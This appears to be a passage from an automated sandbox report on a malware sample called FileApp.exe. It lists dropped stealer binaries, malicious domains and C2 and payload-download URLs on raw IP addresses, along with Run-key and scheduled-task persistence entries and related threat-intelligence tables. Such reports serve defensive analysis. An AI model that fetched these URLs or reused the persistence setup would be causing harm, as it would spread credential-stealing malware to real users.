C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	75%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	71%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	34%	ReversingLabs	Win32.Ransomware.RedLine

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label
stamppreewntnq.shop	100%	URL Reputation	phishing
condedqpwqm.shop	100%	URL Reputation	phishing
locatedblsoqp.shop	100%	URL Reputation	phishing
traineiwnqo.shop	100%	URL Reputation	malware

Name	IP	Active	Malicious	Antivirus Detection	Reputation
youtransfer.net	158.69.225.124	true	false		unknown
ipinfo.io	34.117.59.81	true	false		unknown
file-link-iota.vercel.app	76.76.21.98	true	false		unknown
iplogger.org	104.26.2.46	true	false		unknown
stamppreewntnq.shop	188.114.97.3	true	true	100%, URL Reputation	unknown
condedqpwqm.shop	172.67.146.35	true	true	100%, URL Reputation	unknown
api64.ipify.org	104.237.62.213	true	false		unknown
240902180529931.tyr.zont16.com	unknown	unknown	false		unknown
locatedblsoqp.shop	unknown	unknown	true	100%, URL Reputation	unknown
traineiwnqo.shop	unknown	unknown	true	100%, URL Reputation	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://147.45.68.138/nss3.dll	true
http://46.8.231.109/c4754d4f680ead72.php	true
http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll	true
147.45.47.36:30035	true
http://147.45.44.104/revada/66c6fcb30b9dd_123p.exe	false
https://t.me/edm0d	true
http://147.45.44.104/yuop/66d72df86b9f3_crypted.exe#1	false
http://147.45.44.104/prog/66d7077a2064d_l.exe	false
http://147.45.44.104/prog/66d70775c548d_v.exe#space	false
http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sun	false
http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll	true
http://147.45.68.138/vcruntime140.dll	true
https://iplogger.org/1nhuM4.js	false
https://youtransfer.net/handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5fcca567315ff7c87e27582&url=https%253A%252F%252Fyoutransfer.net%252FuuVCUDm6%252Fcb726802f5fcca567315ff7c87e27582	false
https://steamcommunity.com/profiles/76561199768374681	true
http://147.45.68.138/mozglue.dll	true
http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll	true
locatedblsoqp.shop	true
https://file-link-iota.vercel.app/download	false
caffegclasiqwp.shop	true
millyscroqwp.shop	true
http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll	true
http://147.45.68.138/freebl3.dll	true
traineiwnqo.shop	true

URLs from Memory and Binaries

Name	Source	Malicious
http://62.133.61.172:80/api/twofish.php_	RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	false
https://file-link-iota.vercel.app:80/downloadynamic	RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/yuop/66d72df86b9f3_crypted.exe#1yy3GtoRvFKon$	RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	false
https://steamcommunity.com/profiles/76561199768374681i11ihttps://t.me/edm0dMozilla/5.0	DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp	false
http://147.45.44.104/prog/66d70e8640404_trics.exely.	RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusB9b	RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
https://iplogger.org/X~	RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/golang/protobuf/issues/1609):	m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp	false
http://62.133.61.172:80/api/twofish.php	RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/prog/66d70e8640404_trics.exeeYH	RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	false
https://youtransfer.net/EO	RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusm	RegAsm.exe, 00000002.00000002.2425361902.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/revada/66c6fcb30b9dd_123p.exev	RegAsm.exe, 00000002.00000002.2425361902.0000000003DCE000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.100/	kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014E8000.00000004.00000020.00020000.00000000.sdmp	true
https://api64.ipify.org:443/?format=json	RegAsm.exe, 00000002.00000002.2422723030.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	false
http://154.216.17.178/edge/msconfig32.exe#pendXOp	RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	false
http://gacan.zapto.org_DEBUG.zip/c	DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp	false
http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusce	RegAsm.exe, 00000002.00000002.2425361902.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/prog/66d70e8640404_trics.exeC:	RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upus0DVJtBG	RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe1aH	RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe1n	RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.100	kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp	true
http://147.45.44.104/prog/66d707730e9bf_s.exe#spacecryptol	RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
https://ipinfo.io/widget/demo/8.46.123.33EK	RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	false
http://62.133.61.172/api/twofish.php:	RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.68.138:80hellohttps://t.me/edm0di11iMozilla/5.0	DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp	false
http://147.45.44.104/prog/66d70775c548d_v.exe#spacell	RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.68.138:80	DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp	false
http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeK	RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeQH	RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/prog/66d70775c548d_v.exe#spaceE-	RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
http://62.133.61.172/api/twofish.php(	RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusC:	RegAsm.exe, 00000002.00000002.2425361902.0000000003D40000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/malesa/66d1b7f7f3765_Front.exeC:	RegAsm.exe, 00000002.00000002.2425361902.0000000003D40000.00000004.00000020.00020000.00000000.sdmp	false
https://api.ip.sb/ip	xNc0eiwaHinah8TaPUA3TuXZ.exe, 00000008.00000002.2611175093.00000000033C5000.00000004.00000800.00020000.00000000.sdmp	false
http://www.mozilla.com/en-US/blocklist/	RegAsm.exe	false
http://62.133.61.172:80/api/crazyfish.php	RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp	false
https://api.datamarket.azure.com/data.ashx/	B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.100/e2b1563c6670f193.php/	kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp	false
https://manage.windowsazure.com/publishsettings/indextls:	m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp	false
http://147.45.44.104/malesa/66d1b7f7f3765_Front.exeiH	RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.100/e2b1563c6670f193.php2	kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp	false
http://31.41.244.9/nokia/lamp.exeyJ	RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/dotnet/wpf	l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000000.2385160822.0000000000BB2000.00000002.00000001.01000000.0000000B.sdmp	false
http://240902180529931.tyr.zont16.com/	RegAsm.exe, 00000002.00000002.2425361902.0000000003DDB000.00000004.00000020.00020000.00000000.sdmp	false
http://31.41.244.9/nokia/lamp.exeyE	RegAsm.exe, 00000002.00000002.2422723030.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false
https://condedqpwqm.shop/api)M	BitLockerToGo.exe, 00000025.00000002.2666627496.00000000031B1000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sun3tn?	RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	false
https://iplogger.org/-	RegAsm.exe, 00000002.00000002.2425361902.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/prog/66d70e8640404_trics.exee	RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
http://62.133.61.172/	RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	false
https://datamarket.azure.com/embedded/consent?client_id=	FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp	false
https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comSetConsoleCursorPositionstre	m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp	false
http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe1.	RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sun?	RegAsm.exe, 00000002.00000002.2425361902.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp	false
http://www.winimage.com/zLibDllm_object	B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp	false
https://ipinfo.io/	RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
https://datamarket.azure.com/embedded/resultrhttps://datamarket.accesscontrol.windows.net/v2/OAuth2-	FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp	false
http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upus;	RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusmt	RegAsm.exe, 00000002.00000002.2425361902.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/prog/66d707730e9bf_s.exe#spacexin)HS	RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sun3	RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
https://manage.windowsazure.us/publishsettings/indexcrypto/rsa:	m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp	false
https://iplogger.org/1nhuM4.js4	RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
http://62.133.61.172/7O	RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	false
http://176.111.174.109/bobr1	RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeC:	RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	false
https://ipinfo.io/https://ipgeolocation.io/::	FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004FD3000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2419695402.000000000056B000.00000040.00000400.00020000.00000000.sdmp	false
https://datamarket.azure.com/embedded/catalog?client_id=	FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp	false
http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe5-i	RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/go-sql-driver/mysql/wiki/old_passwords0001020304050607080910111213141516171819202	m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp	false
http://147.45.44.104/yuop/66d58b1858bcb_crypted.exe#xinto	RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false
http://62.133.61.172/api/crazyfish.php	RegAsm.exe, 00000002.00000002.2422723030.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp	false
http://html4/loose.dtd	m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2388267970.0000000001344000.00000008.00000001.01000000.00000012.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2664396294.000000000134D000.00000008.00000001.01000000.00000012.sdmp	false
https://ipinfo.io:443/widget/demo/8.46.123.33	RegAsm.exe, 00000002.00000002.2422723030.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
46.8.231.109	unknown	Russian Federation	28917	FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics	true
185.215.113.100	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
176.111.174.109	unknown	Russian Federation	201305	WILWAWPL	false
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
158.69.225.124	youtransfer.net	Canada	16276	OVHFR	false
104.26.2.46	iplogger.org	United States	13335	CLOUDFLARENETUS	false
31.41.244.9	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
62.133.61.172	unknown	Russian Federation	48430	FIRSTDC-ASRU	true
147.45.68.138	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
104.237.62.213	api64.ipify.org	United States	18450	WEBNXUS	false
154.216.17.178	unknown	Seychelles	135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	false
188.114.97.3	stamppreewntnq.shop	European Union	13335	CLOUDFLARENETUS	true
172.67.146.35	condedqpwqm.shop	United States	13335	CLOUDFLARENETUS	true
76.76.21.98	file-link-iota.vercel.app	United States	16509	AMAZON-02US	false
147.45.47.36	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
77.105.164.24	unknown	Russian Federation	43176	ICOMF-ASRU	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1504272
Start date and time:	2024-09-04 17:36:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	59
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FileApp.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@106/105@12/18
EGA Information:	Successful, ratio: 71.4%
HCA Information:	Successful, ratio: 68% Number of executed functions: 76 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212, 184.28.90.27
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, pool.hashvault.pro, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net
Execution Graph export aborted for target kPy9KuGWnhtidoY4IdmVbiaT.exe, PID 3048 because there are no executed function
Execution Graph export aborted for target l6BAwR4854FJ5LVXvo8GWfAt.exe, PID 5644 because it is empty
Execution Graph export aborted for target m9GWTeQylsPUCcnTEkTCS8lf.exe, PID 6816 because there are no executed function
Execution Graph export aborted for target uht_7KlzJBHoKg010MzYxndX.exe, PID 7012 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: FileApp.exe

Simulations

Behavior and APIs

Time	Type	Description
11:37:28	API Interceptor	1x Sleep call for process: g5YPTfbb3UXQYqfB9k0rJePl.exe modified
11:37:30	API Interceptor	2x Sleep call for process: svchost.exe modified
11:37:31	API Interceptor	1204x Sleep call for process: kPy9KuGWnhtidoY4IdmVbiaT.exe modified
11:37:39	API Interceptor	1x Sleep call for process: WerFault.exe modified
11:37:43	API Interceptor	2x Sleep call for process: BitLockerToGo.exe modified
11:37:50	API Interceptor	1x Sleep call for process: 5Qs0KV98dc5QrQIgi5l7CPu5.exe modified
11:37:54	API Interceptor	54x Sleep call for process: RegAsm.exe modified
17:37:37	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6 C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe
17:37:40	Task Scheduler	Run new task: jewkkwnf HR path: C:\ProgramData\jewkkwnf\jewkkwnf.exe
17:37:40	Task Scheduler	Run new task: jewkkwnf LG path: C:\ProgramData\jewkkwnf\jewkkwnf.exe
17:37:48	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6 C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe
17:37:58	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk
17:38:54	Task Scheduler	Run new task: Colour path: wscript s>//B "C:\Users\user\AppData\Local\InnoCode360 Technologies Co\CodeInno360.js"
17:38:57	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeInno360.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
46.8.231.109	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	66d5ddcec1520_shtr.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	81bl0ZlcJ3.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	gHPYUEh253.exe	Get hash	malicious	Djvu, Neoreklami, Stealc, Vidar, Xmrig	Browse	46.8.231.109/c4754d4f680ead72.php
	kqS23MOytx.exe	Get hash	malicious	Socks5Systemz, Stealc, Vidar, XWorm, Xmrig	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	Z66MsXpleT.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	eSLlhErJ0q.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
185.215.113.100	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
file-link-iota.vercel.app	gHPYUEh253.exe	Get hash	malicious	Djvu, Neoreklami, Stealc, Vidar, Xmrig	Browse	76.76.21.123
file-link-iota.vercel.app	kqS23MOytx.exe	Get hash	malicious	Socks5Systemz, Stealc, Vidar, XWorm, Xmrig	Browse	76.76.21.241
stamppreewntnq.shop	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	66d5ddcec1520_shtr.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	66d5ddcbb9f86_vyre.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	66d4d07501f6e_lsdfn.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	81bl0ZlcJ3.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	ejH1Ma9DnJ.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	xnfvsO7kVN.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	snhNDcl7l4.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
ipinfo.io	uxMCGUELJd.exe	Get hash	malicious	Zorab	Browse	34.117.59.81
	uxMCGUELJd.exe	Get hash	malicious	Zorab	Browse	34.117.59.81
	CODX.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	CODX.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://telegramn.work/web	Get hash	malicious	Telegram Phisher	Browse	34.117.59.81
	https://pub-6ca7156e13e64108869849277ba9b68e.r2.dev/index.html	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://telegerasm.club/web	Get hash	malicious	Telegram Phisher	Browse	34.117.59.81
	http://telegsrawm.club/	Get hash	malicious	Telegram Phisher	Browse	34.117.59.81
	http://telegramw.work/	Get hash	malicious	Telegram Phisher	Browse	34.117.59.81
	http://telegrame.work/	Get hash	malicious	Telegram Phisher	Browse	34.117.59.81
iplogger.org	kqS23MOytx.exe	Get hash	malicious	Socks5Systemz, Stealc, Vidar, XWorm, Xmrig	Browse	104.26.3.46
	abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe	Get hash	malicious	CryptOne, Nymaim, PrivateLoader, RedLine, SmokeLoader, onlyLogger	Browse	172.67.132.113
	ExeFile (331).exe	Get hash	malicious	Unknown	Browse	172.67.132.113
	ExeFile (71).exe	Get hash	malicious	Unknown	Browse	172.67.132.113
	ExeFile (206).exe	Get hash	malicious	RMSRemoteAdmin, Xmrig	Browse	104.21.4.208
	cheat_roblox.exe	Get hash	malicious	XWorm	Browse	172.67.132.113
	roblox cheat.exe	Get hash	malicious	XWorm	Browse	104.21.4.208
	cheat_roblox.exe	Get hash	malicious	XWorm	Browse	104.21.4.208
	roblox cheat.exe	Get hash	malicious	XWorm	Browse	172.67.132.113
	FEB32B614BC7F38CC0B553B5FEE80B7E68AD8AE78DF1F1CAE4016A5AA1C4677A.exe	Get hash	malicious	Bdaejec	Browse	172.67.132.113

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	Software.exe	Get hash	malicious	RedLine	Browse	185.215.113.22
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	66d5ddcec1520_shtr.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	81bl0ZlcJ3.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, Stealc, Vidar	Browse	46.8.231.109
